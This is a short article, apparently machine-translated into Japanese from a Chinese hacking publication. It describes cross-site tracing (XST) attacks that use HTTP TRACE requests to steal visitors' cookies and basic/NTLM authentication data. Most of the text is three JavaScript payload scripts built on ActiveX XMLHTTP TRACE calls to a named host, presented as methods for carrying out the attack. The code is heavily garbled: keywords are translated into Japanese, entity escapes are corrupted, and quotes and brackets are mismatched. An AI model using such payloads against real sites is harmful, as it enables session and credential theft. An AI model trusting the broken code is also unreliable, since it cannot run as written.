cross-site tracing XST攻撃


注意:文章はすでに8期のハッカーの防御線で発表しました。著作権はその所に帰属します。
XST攻撃の説明:
攻撃者は、悪意のコードを制御されたホスト上のウェブファイルに埋め込み、訪問者が閲覧する際に悪意のコードをブラウザで実行し、訪問者のクッキー、http基本検証及びntlm検証情報を制御されたホストに送信し、Trace要求を送信し、クッキー詐欺または中間者攻撃を引き起こす。
XST攻撃条件:
1、ターゲットウェブサーバがTraceパラメータを許可する必要があります。
2、XSTコードを挿入するところが必要です。 
3、対象局にはドメイン・ホールが存在する。
XSTとXSSの比較:
同じ点:いずれも大きな詐欺性を持っており、被害ホストに危害を与えることができます。また、このような攻撃はマルチプラットフォームの多技術です。Activeコントロール、Flash、Javaなどを利用してXSTとXSS攻撃を行うこともできます。
長所:一般的なhttp検証とNTLM検証をバイパスできます。
利用方法:
手法1:
<SCRIPT type=text/java スクリプト>
<!--
機能 xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft&菗46;XMLHTTP\");
xmlHttp&菗46;open(\"TRACE\",\"http://wmjie.51&菗46;net/swords/\false);
xmlHttp&菗46;send()
xmlDoc=xmlHttp&〼46;レスポンスText
alert(xml Doc)
)
//-->



手法2: 
<SCRIPT type=text/java スクリプト>
<!--
機能 xssTRACE() {
var openWin=open(\"blank&噫46;httm\",\"s wods\,\"width=500,height=400\")
var otraces words=openWin&荫46;external
openWin&菵46;locations&菵46;href=\"http://wmjie.51&菗46;net/swords/\";
set Timeout(
機能 () {
//以下は必ず1行に書きます。
otraces wods&{46;NavigateAndFind('java) script:xmlHttp=new ActiveXObject(\"Microsoft&菗46;XMLHTTP\");xmlHttp&菗46;open(\"TRACE\",\"http://wmjie.51&菗46;net/swords/\false);xmlHttp&菗46;send()xmlDoc=xmlHttp&〼46;レスポンスTextalert(\"document&菗46は使用しません。クッキー サイトを表示します。51&菗46;net/swords/ のヘッダ情報を表示します。\\\ + xml Doc)',\\\\\",\"";;;
}
1024
)0
)
//-->



手法3:
<SCRIPT type=text/java スクリプト>
機能 xssTRACE(){
var sワーズ = \"var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\xmlHttp.open(\"TRACE\")、\"http://http://www.tingh.com/\\\"false"\;xmlHttp.send()\xml Doc=xmlHttp.reponseText\alert(xml Doc)\\";
var タージ = \"http://wmjie.51.net/swords/\u 0026 quot;
spinach = encodeURIComponent(swords) + ';top.close()';
var readyCode = 'font-size:expressition(execScript) + spinach + '\")))';
show ModalDialog(target) null readyCode;
)



后记:研究段阶では、れんがを投げて玉を引くことを望んでいます。